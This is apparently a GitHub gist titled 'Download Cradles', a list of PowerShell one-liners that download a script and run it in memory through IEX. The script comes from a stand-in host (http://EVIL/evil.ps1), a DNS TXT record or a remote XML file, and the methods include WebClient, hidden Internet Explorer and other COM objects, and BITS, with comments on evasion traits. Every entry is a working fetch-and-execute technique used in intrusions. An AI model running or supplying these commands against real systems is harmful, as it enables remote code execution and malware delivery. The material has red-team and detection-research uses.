/DownloadCradles.ps1
Last active Sep 20, 2018
Download Cradles
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object | |
| $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText | |
| # WinHttp COM object (not proxy aware!) | |
| $h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText | |
| # using bitstransfer- touches disk! | |
| Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r | |
| # DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1) | |
| # code to execute needs to be a base64 encoded string stored in a TXT record | |
| IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0])))) | |
| # from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d | |
| <# | |
| <?xml version="1.0"?> | |
| <command> | |
| <a> | |
| <execute>Get-Process</execute> | |
| </a> | |
| </command> | |
| #> | |
| $a = New-Object System.Xml.XmlDocument | |
| $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") | |
| $a.command.a.execute | iex |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment